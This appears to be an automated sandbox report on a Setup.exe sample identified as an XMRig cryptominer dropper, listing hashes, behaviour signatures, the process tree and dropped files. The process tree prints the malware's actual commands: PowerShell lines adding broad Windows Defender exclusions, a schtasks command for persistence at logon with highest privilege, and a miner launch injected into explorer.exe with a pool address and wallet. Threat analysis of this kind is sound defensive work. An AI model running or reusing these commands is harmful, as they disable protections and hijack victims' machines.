Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    21-12-2024 17:21

General

  • Target

    Setup.exe

  • Size

    29.8MB

  • MD5

    f39a0615ad5482c3ffd8f46baeac3ac3

  • SHA1

    e4cd77ab330f734e7a5253c07c559e8c92d88c35

  • SHA256

    643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b

  • SHA512

    fecb43e388dd09421083554def45d750ae848cacd061c078a7a5e02820edd3ca761240fd0a6ec2672223afe07b887d6d789f7ae9c65f40b9437196427f001481

  • SSDEEP

    786432:PkvEnDem3vOYqVx9BvEiI8hXcclLOhiKw+HSD:svEn6mfN4xvcehFs7SD

Score
10/10

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 17 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 42 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
      2⤵
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2732
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2796
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:792
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2708
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2312
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Windows\system32\services64.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2540
        • C:\Windows\system32\services64.exe
          C:\Windows\system32\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:3036
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
            5⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2308
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2960
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2876
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1940
            • C:\Windows\system32\Microsoft\Libs\sihost64.exe
              "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1156
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "/sihost64"
                7⤵
                  PID:960
              • C:\Windows\explorer.exe
                C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=44uwibUE5EF8oiYGZWhDJ6YxTYoL8YgzyYw5ofRojJrtZydAndawV157eimKXonkgsi8ZNdvRq22xC6dmxwmq2tpQ4nTUDe --pass= --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1288

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      310c3cdd23fc7250caf5dcde1ba48a53

      SHA1

      a982c18a608735a75bf737633a69043cc2a32b7e

      SHA256

      f9781b373e8e8077ab50aa84da087bf2bd32615d0260b8b56a411eb8d87c633b

      SHA512

      11b7b1fcfd0c5db9a70c75433b249329be22cd0f7d5ffbe43cb6b2dc6b970b2c31b053164e9eaea5c36e23447d6514a27c2bc75ee503a2098bcdfd393025b7c5

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      d8263a5a88d6a7e725ff784e3a1917ba

      SHA1

      2a578236eb7fc13d34cb510bbd5115b7cbaa11ee

      SHA256

      34394741911d4bbdae6641a7ad46cebcb02f2e3dd9fe813d9178910454aaa575

      SHA512

      40e972301acb78ed20ebc16eaf87bcadc8d48d6bed941879aa5fbfea73a4a0ab0326e2dc0604ffb086cfa4dc889c60cdc4ad240b5d604a3ce03b87e007c2e5a6

    • C:\Windows\System32\Microsoft\Libs\sihost64.exe

      Filesize

      32KB

      MD5

      554b19e8d2cd3728ec5557c08cd2151b

      SHA1

      7f22b80a8b3a141a93735f4423fda76f914dd92c

      SHA256

      53b161d512a4cc0e7ad58be8bb5155e37399afe56cd7df38e9f0c4f09bb1cf56

      SHA512

      46103c9ffb4483107ad0f5b91aba14464747a75a058d2610714f7155e0c014b094de0fb7f40d1515a008f70763131a4b7964d739a2e4381ac38a47755f6938a0

    • \Windows\System32\services64.exe

      Filesize

      29.8MB

      MD5

      f39a0615ad5482c3ffd8f46baeac3ac3

      SHA1

      e4cd77ab330f734e7a5253c07c559e8c92d88c35

      SHA256

      643494eec31570d49b4b101281ae8d5c58ebcb7311ccece8d1c478fefbadde9b

      SHA512

      fecb43e388dd09421083554def45d750ae848cacd061c078a7a5e02820edd3ca761240fd0a6ec2672223afe07b887d6d789f7ae9c65f40b9437196427f001481

    • memory/792-19-0x00000000021D0000-0x00000000021D8000-memory.dmp

      Filesize

      32KB

    • memory/792-18-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

      Filesize

      2.9MB

    • memory/960-86-0x00000000001E0000-0x00000000001E6000-memory.dmp

      Filesize

      24KB

    • memory/960-85-0x0000000000060000-0x0000000000067000-memory.dmp

      Filesize

      28KB

    • memory/1288-71-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-59-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-79-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-45-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-51-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-76-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-78-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-77-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-75-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-50-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-72-0x00000000000E0000-0x0000000000100000-memory.dmp

      Filesize

      128KB

    • memory/1288-74-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-70-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-67-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-65-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-63-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-61-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-53-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-57-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-55-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/1288-69-0x000007FFFFFDF000-0x000007FFFFFE0000-memory.dmp

      Filesize

      4KB

    • memory/1288-47-0x0000000140000000-0x0000000140786000-memory.dmp

      Filesize

      7.5MB

    • memory/2732-0-0x0000000000110000-0x0000000001ECF000-memory.dmp

      Filesize

      29.7MB

    • memory/2732-4-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2732-5-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2732-6-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2732-24-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2732-21-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2732-20-0x000007FEF5793000-0x000007FEF5794000-memory.dmp

      Filesize

      4KB

    • memory/2732-3-0x000007FEF5790000-0x000007FEF617C000-memory.dmp

      Filesize

      9.9MB

    • memory/2732-2-0x00000000208C0000-0x000000002267E000-memory.dmp

      Filesize

      29.7MB

    • memory/2732-1-0x000007FEF5793000-0x000007FEF5794000-memory.dmp

      Filesize

      4KB

    • memory/2796-12-0x0000000002240000-0x0000000002248000-memory.dmp

      Filesize

      32KB

    • memory/2796-11-0x000000001B520000-0x000000001B802000-memory.dmp

      Filesize

      2.9MB